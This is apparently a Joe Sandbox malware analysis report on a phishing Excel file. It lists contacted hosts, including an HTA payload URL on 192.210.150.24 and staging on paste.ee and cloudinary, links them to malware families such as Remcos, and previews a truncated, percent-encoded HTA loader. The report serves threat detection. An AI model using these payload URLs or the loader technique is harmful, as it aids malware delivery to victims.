http://crl.pkioverheid.nl/DomOvLatestCRL.crl0	mshta.exe, 00000004.00000002.429796823.0000000003B64000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.424930147.0000000003B64000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.424450335.0000000003B64000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.445283561.000000001C76D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.466152051.00000000038AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.476994248.00000000038B1000.00000004.00000020.00020000.00000000.sdmp	false		high
https://res.cloudinary.com	powershell.exe, 0000000D.00000002.494191890.00000000023E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.527923498.0000000002222000.00000004.00000800.00020000.00000000.sdmp	false		high
https://jktc.pro/	mshta.exe, 00000004.00000002.429796823.0000000003B64000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.424930147.0000000003B64000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.424450335.0000000003B64000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.466152051.00000000038DB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.468834962.000000000042F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.476811997.000000000042F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.476994248.00000000038DB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.476811997.0000000000463000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.476653364.0000000000463000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.476653364.000000000042F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.468834962.0000000000463000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://analytics.paste.ee;	powershell.exe, 0000000D.00000002.494191890.00000000025B4000.00000004.00000800.00020000.00000000.sdmp	false		high
http://192.210.150.24/55/crm/creamkissingthingswithcreambananapackagecreamy.htating=penitent&cop-out	mshta.exe, 0000000F.00000002.476811997.00000000003AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.468834962.000000000041D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.476653364.000000000041D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.476811997.000000000041D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://192.210.150.24/55/crm/creamkissingthingswithcreambananapackagecreamy.hta1	mshta.exe, 0000000F.00000003.468834962.000000000042F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.476811997.000000000042F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.476653364.000000000042F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://secure.comodo.com/CPS0	mshta.exe, 00000004.00000002.429796823.0000000003B64000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.424930147.0000000003B64000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.424450335.0000000003B64000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.445283561.000000001C725000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.445283561.000000001C76D000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.445283561.000000001C717000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.466152051.00000000038AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.476994248.00000000038B1000.00000004.00000020.00020000.00000000.sdmp	false		high
http://192.210.150.24/55/crm/creamkissingthingswithcreambananapackagecreamy.hta$	mshta.exe, 0000000F.00000003.468834962.000000000042F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.476811997.000000000042F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.476653364.000000000042F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://themes.googleusercontent.com	powershell.exe, 0000000D.00000002.494191890.00000000025B4000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.entrust.net/2048ca.crl0	mshta.exe, 00000004.00000002.429796823.0000000003B64000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.424930147.0000000003B64000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.424450335.0000000003B64000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.445283561.000000001C76D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.466152051.00000000038AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.476994248.00000000038B1000.00000004.00000020.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
107.173.143.10	newglobalfucntioninside.duckdns.org	United States	36352	AS-COLOCROSSINGUS	false
188.114.97.6	paste.ee	European Union	13335	CLOUDFLARENETUS	false
151.101.129.137	cloudinary.map.fastly.net	United States	54113	FASTLYUS	false
192.210.150.24	unknown	United States	36352	AS-COLOCROSSINGUS	true
172.67.163.184	jktc.pro	United States	13335	CLOUDFLARENETUS	false
104.21.34.183	unknown	United States	13335	CLOUDFLARENETUS	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1574074
Start date and time:	2024-12-12 21:55:01 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 7m 48s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:	30
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled GSI enabled (VBA) AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Cot90012ARCACONTAL.xls
Detection:	MAL
Classification:	mal100.phis.troj.expl.evad.winXLS@35/41@136/6
EGA Information:	Successful, ratio: 33.3%
HCA Information:	Successful, ratio: 100% Number of executed functions: 10 Number of non-executed functions: 1
Cookbook Comments:	Found application associated with file extension: .xls Changed system and user locale, location and keyboard layout to French - France Found Word or Excel or PowerPoint or XPS Viewer Attach to Office via COM Active ActiveX Object Active ActiveX Object Active ActiveX Object Active ActiveX Object Scroll down Close Viewer

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 104.17.202.1, 104.17.201.1, 104.208.16.93
Excluded domains from analysis (whitelisted): onedsblobprdcus07.centralus.cloudapp.azure.com, watson.microsoft.com, resc.cloudinary.com.cdn.cloudflare.net, legacywatson.trafficmanager.net
Execution Graph export aborted for target mshta.exe, PID 2504 because there are no executed function
Execution Graph export aborted for target mshta.exe, PID 3568 because there are no executed function
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: Cot90012ARCACONTAL.xls

Simulations

Behavior and APIs

Time	Type	Description
15:56:19	API Interceptor	133x Sleep call for process: mshta.exe modified
15:56:25	API Interceptor	200x Sleep call for process: powershell.exe modified
15:56:34	API Interceptor	12x Sleep call for process: wscript.exe modified
15:56:41	API Interceptor	77x Sleep call for process: DWWIN.EXE modified
15:56:59	API Interceptor	1148716x Sleep call for process: CasPol.exe modified

LLM Input / Output

Input	Output
URL: Screenshot id: 9 Model: Joe Sandbox AI	{ "contains_trigger_text": false, "trigger_text": "unknown", "prominent_button_name": "unknown", "text_input_field_labels": "unknown", "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false }

URL: Screenshot id: 4 Model: Joe Sandbox AI	{ "contains_trigger_text": true, "trigger_text": "PURCHASE ORDER", "prominent_button_name": "unknown", "text_input_field_labels": "unknown", "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false }

URL: Screenshot id: 2 Model: Joe Sandbox AI	{ "contains_trigger_text": true, "trigger_text": "PURCHASE ORDER", "prominent_button_name": "unknown", "text_input_field_labels": "unknown", "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false }

URL: Screenshot id: 3 Model: Joe Sandbox AI	{ "contains_trigger_text": true, "trigger_text": "PURCHASE ORDER", "prominent_button_name": "unknown", "text_input_field_labels": "unknown", "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false }

URL: Screenshot id: 1 Model: Joe Sandbox AI	{ "contains_trigger_text": true, "trigger_text": "PURCHASE ORDER", "prominent_button_name": "unknown", "text_input_field_labels": "unknown", "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false }

URL: Screenshot id: 8 Model: Joe Sandbox AI	{ "contains_trigger_text": true, "trigger_text": "Description of Product 1", "prominent_button_name": "unknown", "text_input_field_labels": "unknown", "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false }

URL: Screenshot id: 9 Model: Joe Sandbox AI	{ "brands": "unknown" }
	{ "brands": "unknown" }
URL: Screenshot id: 1 Model: Joe Sandbox AI	{ "brands": "unknown" }
	{ "brands": "unknown" }
URL: Screenshot id: 8 Model: Joe Sandbox AI	{ "brands": "unknown" }
	{ "brands": "unknown" }
URL: Screenshot id: 3 Model: Joe Sandbox AI	{ "brands": "unknown" }
	{ "brands": "unknown" }
URL: Screenshot id: 2 Model: Joe Sandbox AI	{ "brands": "unknown" }
	{ "brands": "unknown" }
URL: Screenshot id: 7 Model: Joe Sandbox AI	```json { "contains_trigger_text": false, "trigger_text": "unknown", "prominent_button_name": "unknown", "text_input_field_labels": "unknown", "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false }

URL: Screenshot id: 7 Model: Joe Sandbox AI	{ "brands": "unknown" }
	{ "brands": "unknown" }
URL: Screenshot id: 4 Model: Joe Sandbox AI	{ "brands": "unknown" }
	{ "brands": "unknown" }

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
188.114.97.6	RFQ_P.O.1212024.scr	Get hash	malicious	FormBook	Browse	www.questmatch.pro/1yxc/
	8WgZHDQckx.exe	Get hash	malicious	Pony	Browse	www.dynamotouren.com/?dynamotouren.de
	fUHl7rElXU.xlsx	Get hash	malicious	Unknown	Browse	paste.ee/d/OARvm
	ibk0BQaWAo.exe	Get hash	malicious	Unknown	Browse	orbitdownloader.com/
	ibk0BQaWAo.exe	Get hash	malicious	Unknown	Browse	orbitdownloader.com/
	INVOICE087667899.exe	Get hash	malicious	Unknown	Browse	heygirlisheeverythingyouwantedinaman.comheygirlisheeverythingyouwantedinaman.com:443
	ZciowjM9hN.exe	Get hash	malicious	Lokibot	Browse	vmopahtqdf84hfvsqepalcbcch63gdyvah.ml/BN2/fre.php
151.101.129.137	Plugin81139.js	Get hash	malicious	PureLog Stealer, RevengeRAT, zgRAT	Browse
	PO-8776-2024.js	Get hash	malicious	Remcos	Browse
	bestimylover.hta	Get hash	malicious	Cobalt Strike, FormBook, HTMLPhisher	Browse
	nicpeoplesideasgivenforme.hta	Get hash	malicious	Cobalt Strike, HTMLPhisher	Browse
	https://0azeevmdi7.codedesign.app/	Get hash	malicious	Unknown	Browse
	http://christians-google-sh-97m2.glide.page/dl/d0a5f4	Get hash	malicious	Unknown	Browse
	Steelcase Series 1 Sustainable Office Chair _ Steelcase.html	Get hash	malicious	Unknown	Browse
	https://jenifer-lopezz.pages.dev/	Get hash	malicious	Unknown	Browse
	https://bookme.name/simonmed/us	Get hash	malicious	HtmlDropper, HTMLPhisher	Browse
	https://asset.cloudinary.com/dclug8dsh/490e37baf41d2124fee1d1d5aeaf2423	Get hash	malicious	HTMLPhisher	Browse
172.67.163.184	4lXTg8P7Ih.elf	Get hash	malicious	Mirai	Browse	/tmUnblock.cgi

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
cloudinary.map.fastly.net	Euro confirmation Sp.xls	Get hash	malicious	Unknown	Browse	151.101.1.137
	stage2.ps1	Get hash	malicious	PureLog Stealer, RevengeRAT, zgRAT	Browse	151.101.193.137
	nicegirlforyou.hta	Get hash	malicious	Cobalt Strike, Remcos	Browse	151.101.1.137
	invoice09850.xls	Get hash	malicious	Remcos	Browse	151.101.65.137
	Invoice A037.xls	Get hash	malicious	Unknown	Browse	151.101.1.137
	Plugin81139.js	Get hash	malicious	PureLog Stealer, RevengeRAT, zgRAT	Browse	151.101.129.137
	PO-8776-2024.js	Get hash	malicious	Remcos	Browse	151.101.129.137
	New Order Enquiry.js	Get hash	malicious	AgentTesla	Browse	151.101.193.137
	NESTLE_MEXICO_Purchase_Order_10122024.xls	Get hash	malicious	Unknown	Browse	151.101.65.137
	Orden_de_Compra_Nmero_6782929219.xls	Get hash	malicious	HTMLPhisher	Browse	151.101.65.137
jktc.pro	SOA USD67,353.35.xla.xlsx	Get hash	malicious	Unknown	Browse	172.67.163.184
	Euro confirmation Sp.xls	Get hash	malicious	Unknown	Browse	104.21.34.183
	510005940.docx.doc	Get hash	malicious	Unknown	Browse	104.21.34.183
	510005940.docx.doc	Get hash	malicious	Unknown	Browse	172.67.163.184
paste.ee	SOA USD67,353.35.xla.xlsx	Get hash	malicious	Unknown	Browse	188.114.97.6
	Euro confirmation Sp.xls	Get hash	malicious	Unknown	Browse	188.114.96.6
	print preview.js	Get hash	malicious	FormBook	Browse	172.67.187.200
	nicegirlforyou.hta	Get hash	malicious	Cobalt Strike, Remcos	Browse	104.21.84.67
	nicewithgreatfeaturesreturnformebestthingsgivensoofar.hta	Get hash	malicious	Cobalt Strike, Remcos	Browse	104.21.84.67
	invoice09850.xls	Get hash	malicious	Remcos	Browse	188.114.97.6
	Invoice A037.xls	Get hash	malicious	Unknown	Browse	188.114.97.6
	PO-8776-2024.js	Get hash	malicious	Remcos	Browse	104.21.84.67
	NESTLE_MEXICO_Purchase_Order_10122024.xls	Get hash	malicious	Unknown	Browse	188.114.97.6
	matchingwithbestthingstobegreatforentirelifegivenmebestthignsevergive.hta	Get hash	malicious	Cobalt Strike, Remcos, HTMLPhisher	Browse	104.21.84.67

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	RFQ3978 39793980.pdf.exe	Get hash	malicious	FormBook	Browse	104.21.95.160
	SOA USD67,353.35.xla.xlsx	Get hash	malicious	Unknown	Browse	104.21.34.183
	Ziraat Bankasi Swift Mesaji.exe	Get hash	malicious	MassLogger RAT	Browse	172.67.177.134
	Euro confirmation Sp.xls	Get hash	malicious	Unknown	Browse	104.21.34.183
	WO-663071 Sabiya Power Station Project.vbs	Get hash	malicious	Remcos	Browse	162.159.129.233
	ltT8eZaqtZ.exe	Get hash	malicious	LummaC Stealer, PureLog Stealer	Browse	172.67.216.167
	htZgRRla8S.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.206.64
	0TGy7VIqx7CSab5o.lNK.lnk	Get hash	malicious	Unknown	Browse	172.67.185.252
	https://es-proposal.webflow.io/	Get hash	malicious	HTMLPhisher	Browse	104.21.112.1
	http://ebaumsworld.com	Get hash	malicious	Unknown	Browse	104.17.159.113
FASTLYUS	Euro confirmation Sp.xls	Get hash	malicious	Unknown	Browse	151.101.65.137
	file.exe	Get hash	malicious	Credential Flusher	Browse	151.101.129.91
	file.exe	Get hash	malicious	Credential Flusher	Browse	151.101.129.91
	https://es-proposal.webflow.io/	Get hash	malicious	HTMLPhisher	Browse	151.101.194.137
	file.exe	Get hash	malicious	Credential Flusher	Browse	151.101.65.91
	file.exe	Get hash	malicious	Credential Flusher	Browse	151.101.65.91
	file.exe	Get hash	malicious	Amadey, Credential Flusher, Stealc, Vidar	Browse	151.101.193.91
	https://morgans-proposal-site.webflow.io/	Get hash	malicious	Captcha Phish, HTMLPhisher	Browse	151.101.66.137
	file.exe	Get hash	malicious	Credential Flusher	Browse	151.101.1.91
	file.exe	Get hash	malicious	Credential Flusher	Browse	151.101.193.91
AS-COLOCROSSINGUS	SOA USD67,353.35.xla.xlsx	Get hash	malicious	Unknown	Browse	107.172.44.175
	Euro confirmation Sp.xls	Get hash	malicious	Unknown	Browse	23.95.235.29
	SwiftCopy_PaymtRecpt121224.exe	Get hash	malicious	Remcos	Browse	192.210.150.17
	Document.xla	Get hash	malicious	Unknown	Browse	107.172.44.175
	Document.xla	Get hash	malicious	Unknown	Browse	107.172.44.175
	Document.xla	Get hash	malicious	Unknown	Browse	107.172.44.175
	Document.xla	Get hash	malicious	Unknown	Browse	107.172.44.175
	nicegirlforyou.hta	Get hash	malicious	Cobalt Strike, Remcos	Browse	172.245.142.60
	nicewithgreatfeaturesreturnformebestthingsgivensoofar.hta	Get hash	malicious	Cobalt Strike, Remcos	Browse	192.3.101.149
	invoice09850.xls	Get hash	malicious	Remcos	Browse	192.3.101.149
AS-COLOCROSSINGUS	SOA USD67,353.35.xla.xlsx	Get hash	malicious	Unknown	Browse	107.172.44.175
	Euro confirmation Sp.xls	Get hash	malicious	Unknown	Browse	23.95.235.29
	SwiftCopy_PaymtRecpt121224.exe	Get hash	malicious	Remcos	Browse	192.210.150.17
	Document.xla	Get hash	malicious	Unknown	Browse	107.172.44.175
	Document.xla	Get hash	malicious	Unknown	Browse	107.172.44.175
	Document.xla	Get hash	malicious	Unknown	Browse	107.172.44.175
	Document.xla	Get hash	malicious	Unknown	Browse	107.172.44.175
	nicegirlforyou.hta	Get hash	malicious	Cobalt Strike, Remcos	Browse	172.245.142.60
	nicewithgreatfeaturesreturnformebestthingsgivensoofar.hta	Get hash	malicious	Cobalt Strike, Remcos	Browse	192.3.101.149
	invoice09850.xls	Get hash	malicious	Remcos	Browse	192.3.101.149

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
05af1f5ca1b87cc9cc9b25185115607d	Euro confirmation Sp.xls	Get hash	malicious	Unknown	Browse	151.101.129.137
	510005940.docx.doc	Get hash	malicious	Unknown	Browse	151.101.129.137
	invoice09850.xls	Get hash	malicious	Remcos	Browse	151.101.129.137
	Invoice A037.xls	Get hash	malicious	Unknown	Browse	151.101.129.137
	Request for quote.doc	Get hash	malicious	Snake Keylogger	Browse	151.101.129.137
	NESTLE_MEXICO_Purchase_Order_10122024.xls	Get hash	malicious	Unknown	Browse	151.101.129.137
	FATR98765678000.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	151.101.129.137
	Orden_de_Compra_Nmero_6782929219.xls	Get hash	malicious	HTMLPhisher	Browse	151.101.129.137
	Payment Confirmation..docm	Get hash	malicious	Snake Keylogger	Browse	151.101.129.137
	Potvrda_o_uplati.docx.doc	Get hash	malicious	Unknown	Browse	151.101.129.137
7dcce5b76c8b17472d024758970a406b	Estado.de.cuenta.xls	Get hash	malicious	AveMaria, UACMe	Browse	104.21.34.183 172.67.163.184
	SOA USD67,353.35.xla.xlsx	Get hash	malicious	Unknown	Browse	104.21.34.183 172.67.163.184
	Euro confirmation Sp.xls	Get hash	malicious	Unknown	Browse	104.21.34.183 172.67.163.184
	510005940.docx.doc	Get hash	malicious	Unknown	Browse	104.21.34.183 172.67.163.184
	Document.xla	Get hash	malicious	Unknown	Browse	104.21.34.183 172.67.163.184
	xeroxscan.Docx	Get hash	malicious	Unknown	Browse	104.21.34.183 172.67.163.184
	xeroxscan.Docx	Get hash	malicious	Unknown	Browse	104.21.34.183 172.67.163.184
	invoice09850.xls	Get hash	malicious	Remcos	Browse	104.21.34.183 172.67.163.184
	Document.xla.xlsx	Get hash	malicious	Unknown	Browse	104.21.34.183 172.67.163.184
	Invoice A037.xls	Get hash	malicious	Unknown	Browse	104.21.34.183 172.67.163.184
36f7277af969a6947a61ae0b815907a1	invoice09850.xls	Get hash	malicious	Remcos	Browse	188.114.97.6
	Xkl0PnD8zFPjfh1.wiz.rtf	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.6
	2024-HRDCL-0000796.xls	Get hash	malicious	Unknown	Browse	188.114.97.6
	2024-HRDCL-0000796.xls	Get hash	malicious	Unknown	Browse	188.114.97.6
	DHL Shipment DOCs_002.xls	Get hash	malicious	Unknown	Browse	188.114.97.6
	Po docs.xls	Get hash	malicious	HTMLPhisher, Lokibot	Browse	188.114.97.6
	DHL Shipment DOCs_002.xls	Get hash	malicious	Unknown	Browse	188.114.97.6
	Bank Swift Copy 2.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.6
	Document.xla.xlsx	Get hash	malicious	Unknown	Browse	188.114.97.6
	Document.xla.xlsx	Get hash	malicious	Unknown	Browse	188.114.97.6

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	15189
Entropy (8bit):	5.0343247648743
Encrypted:	false
SSDEEP:	384:nWraVoGIpN6KQkj2Lkjh4iUxTnaVjvCnS/OdBmRWDf:nW+V3IpNBQkj2Oh4iUxDaVjvCnS/OdBD
MD5:	7BC3FB6565E144A52C5F44408D5D80DF
SHA1:	C3C443BF9F29EAA84B0A580FD5469F4C5CC57F77
SHA-256:	EF6A75C051D70322EDCD5A89E6398CC00E3D860E87A0C7981310D30837CBA495
SHA-512:	D0A936BAF2277884518EDF4729F88DA74C7BAA5BBB58C1060CE66DE92A23694EA993CA69D8820816C5D28182E9A38EE59DE821EE3A73F0D85DBBC74D406285A5
Malicious:	false
Preview:	PSMODULECACHE.....8.......S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script..........V.7...?...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\ISE\ISE.psd1........Import-IseSnippet........Get-IseSnippet........New-IseSnippet.........._.7...[...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\PSWorkflowUtility\

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	HTML document, ASCII text, with very long lines (65450), with CRLF line terminators
Category:	modified
Size (bytes):	82678
Entropy (8bit):	2.4638385282510207
Encrypted:	false
SSDEEP:	768:tmbUZA+cT/RVeU2Dx6AyZ6LAuAHA/OxlbVxP7iZ5VQSG/wa3s+RP7i2dfwwwAkKD:tk
MD5:	049640AA09B45F8F374EC9FFF6E272E5
SHA1:	CA0990EA3DB24491C5A5CE408B921383B0D74DB8
SHA-256:	277BCE05FE87B2C2EDD725DC6BC75C98A9F3D3FC68159A65471625009FE0E9E7
SHA-512:	044CC9E601D6809AE166A99C91656B54FC602D088EDBA57013F2575EBE2E2DD0200E29335494977479A5ED04D81313D5B4816A7EC419E14DF95F773133C9A7CC
Malicious:	true
Yara Hits:	Rule: JoeSecurity_Obshtml, Description: Yara detected obfuscated html page, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\creamkissingthingswithcreambananapackagecreamy[1].hta, Author: Joe Security
Preview:	<Script Language='Javascript'>.. HTML Encryption provided by tufat.com -->.. ..document.write(unescape('%3C%53%63%72%69%70%74%20%4C%61%6E%67%75%61%67%65%3D%27%4A%61%76%61%73%63%72%69%70%74%27%3E%0A%3C%21%2D%2D%20%48%54%4D%4C%20%45%6E%63%72%79%70%74%69%6F%6E%20%70%72%6F%76%69%64%65%64%20%62%79%20%74%75%66%61%74%2E%63%6F%6D%20%2D%2D%3E%0A%3C%21%2D%2D%0A%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%75%6E%65%73%63%61%70%65%28%27%25%33%43%25%32%31%25%34%34%25%34%46%25%34%33%25%35%34%25%35%39%25%35%30%25%34%35%25%32%30%25%36%38%25%37%34%25%36%44%25%36%43%25%33%45%25%30%41%25%33%43%25%36%44%25%36%35%25%37%34%25%36%31%25%32%30%25%36%38%25%37%34%25%37%34%25%37%30%25%32%44%25%36%35%25%37%31%25%37%35%25%36%39%25%37%36%25%33%44%25%32%32%25%35%38%25%32%44%25%35%35%25%34%31%25%32%44%25%34%33%25%36%46%25%36%44%25%37%30%25%36%31%25%37%34%25%36%39%25%36%32%25%36%43%25%36%35%25%32%32%25%32%30%25%36%33%25%36%46%25%36%45%25%37%34%25%36%35%25%36%45%25%37%34%25%33%44%25%32%32%25%34%39%25%34%35%25%33%

Process:	C:\Windows\System32\DWWIN.EXE
File Type:	Windows Error Report
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.1120043918711404
Encrypted:	false
SSDEEP:	96:R2aVsgPpfS5QXIlizw+HbngICZgpYT1uPoGl9uyEYcbkMIbFY7UGQIiTOB1rXAmW:RfzFCEuhTSYE5jFVaJ
MD5:	9DDC2BEC2D8B71EC9C2819D403045D22
SHA1:	1A315361EC3DECAF14BED57B97EAB23AB9B976A2
SHA-256:	B7381D502E9754C67F24032F6C4F695F9F128535A7333712F2B52659D73B5DA9
SHA-512:	AD0C3C63598991F1286EF4CD4BAA73EDBCAE8AB24DBA9D9973971BB6EE27AF81CE6DEFCF7A1079F1AFC08C94E8696DC6151D57A46B4ACE5E513EAC121350A98D
Malicious:	false
Preview:	V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.8.5.1.0.6.0.1.0.8.3.4.1.4.0.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.8.5.1.0.6.0.4.5.1.5.3.7.0.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.5.a.7.0.3.3.4.-.b.8.c.b.-.1.1.e.f.-.8.f.3.8.-.e.c.f.4.b.b.b.5.9.1.5.b.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.5.a.7.0.3.3.3.-.b.8.c.b.-.1.1.e.f.-.8.f.3.8.-.e.c.f.4.b.b.b.5.9.1.5.b.....R.e.s.p.o.n.s.e...t.y.p.e.=.4.....S.i.g.[.0.]...N.a.m.e.=.A.p.p.l.i.c.a.t.i.o.n. .N.a.m.e.....S.i.g.[.0.]...V.a.l.u.e.=.E.X.C.E.L...E.X.E.....S.i.g.[.1.]...N.a.m.e.=.A.p.p.l.i.c.a.t.i.o.n. .V.e.r.s.i.o.n.....S.i.g.[.1.]...V.a.l.u.e.=.1.4...0...6.0.2.4...1.0.0.0.....S.i.g.[.2.]...N.a.m.e.=.A.p.p.l.i.c.a.t.i.o.n. .T.i.m.e.s.t.a.m.p.....S.i.g.[.2.]...V.a.l.u.e.=.4.d.8.3.e.3.9.d.....S.i.g.[.3.]...N.a.m.e.=.F.a.u.l.t. .M.o.d.u.l.e. .N.a.m.e.....S.i.g.[.3.]...V.a.l.u.e.=.E.X.C.E.L...E.X.E.....S.i.g.[.4.]...N.a.m.e.=.F.a.u.l.t.

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	3072
Entropy (8bit):	2.828692158775705
Encrypted:	false
SSDEEP:	24:etGSqPBe5ekrl8KLkZylYb8z7UZMtkZfY7ObCZ0WI+ycuZhNy5akS9OPNnq:6Rskr+KxO8z7UdJYybCZX1uly5a39Sq
MD5:	50D0C15E1BE416D78B7E6CCECE804B15
SHA1:	0ACFFDEEA60E7490B33A3046EC64D9BEA0C0FC91
SHA-256:	1571B8F0CEE96CBDDA3706A0CBDA8ABCF653229B569D2CF3F55FE5A258E07089
SHA-512:	2F8C4D30B1C482CA23A2801840A7D817D0D65C30CC9F60AEE9D4FD38E3F0184782D94277D44E22B14BEF703802E24CFA2A464372F429116EEA1C771BF0A5DE1F
Malicious:	false
